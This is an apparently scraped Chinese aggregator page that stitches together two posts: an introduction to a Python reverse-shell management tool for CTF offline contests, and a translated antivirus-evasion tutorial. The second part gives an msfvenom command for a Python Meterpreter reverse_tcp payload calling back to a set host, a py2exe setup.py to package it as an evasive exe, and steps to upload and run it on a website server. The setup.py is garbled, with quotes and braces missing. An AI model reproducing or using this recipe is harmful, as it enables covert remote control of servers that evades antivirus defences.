[工具介绍] 反弹 shell 管理工具

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[工具介绍] 反弹 shell 管理工具相关的知识,希望对你有一定的参考价值。

参考技术A 介绍一款基于 Python 开发的 反弹 shell 管理工具 Reverse-Shell-Manager

在 CTF线下赛 的时候 , 如果通过 web 或者 pwn 已经拿到了一台服务器的控制权
那么我们可以使用反弹 shell 来对该服务器进行一个长期的权限维持
一般反弹 shell 的时候我们会怎么做呢 ?
比如说这里有一个台服务器可以 RCE 了

如果要反弹的话 , 我们首先要在自己的服务器上监听一个端口 :

然后再在目标服务器上执行 :

这样就能拿到该服务器的 shell 了
但是
一旦链接断开 , 那么就要重新利用漏洞反弹一个新的 shell
这样是不是很麻烦 , 而且还会暴露漏洞是如何被利用的
如果对方抓取了流量进行分析的话 , 很快就会把漏洞补上

而且
一般线下赛很多时候需要一些自动化的脚本来运维和进行权限维持
所以写了一个小工具 , 希望能有用

大概功能就是 :

下面有一个简单的介绍视频 :

如果可以给你带来帮助的话 , 可不可以 Star 一下呐 , ヽ(✿゚▽゚)ノ

分享一个免杀的反弹shell工具(python脚本转换成exe)

有时候网站服务器上有杀毒软件,我们上传的nc.exe、lcx.exe等工具都被杀了,这时候就需要一款免杀的工具来反弹shell。

这篇博客主要是依据国外的一片文章翻译而来,根据国外大佬的教程将Python脚本转换成exe程序即可免杀。

参考链接:https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1

 

第1步:安装Python2.7和Py2exe

一定要安装32位的Python 2.7和32位的Py2exe,不管你的操作系统是多少位的都要安装32位版本。

第2步:生成Python脚本

利用msfvenom生成Python脚本:

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.34.2 lport=443 -f raw -o /tmp/mrtp.py

技术图片

第3步:创建setup.py

from distutils.core import setup
import py2exe
setup(
name = Meter,
description = Python-based App,
version = 1.0,
console=[mrtp.py],
options = py2exe: bundle_files: 1,packages:ctypes,includes: base64,sys,socket,struct,time,code,platform,getpass,shutil,,
zipfile = None,
)

第4步:生成exe

将之前生成的mrtp.py和setup.py放在同一个目录,然后执行命令:

python setup.py py2exe

稍等几秒钟即可转换成功,生成的exe程序保存dist目录。

技术图片

第5步:反弹shell

首先使用MSF监听端口等待回连,然后将生成的exe程序上传的网站服务器并运行该程序即可反弹shell。

技术图片

技术图片

 

以上是关于[工具介绍] 反弹 shell 管理工具的主要内容,如果未能解决你的问题,请参考以下文章

分享一个免杀的反弹shell工具(python脚本转换成exe)

微信劫持反弹shell复现

【安全记录】反弹shell小记

NC反弹shell

反弹shell小结

反弹shell基础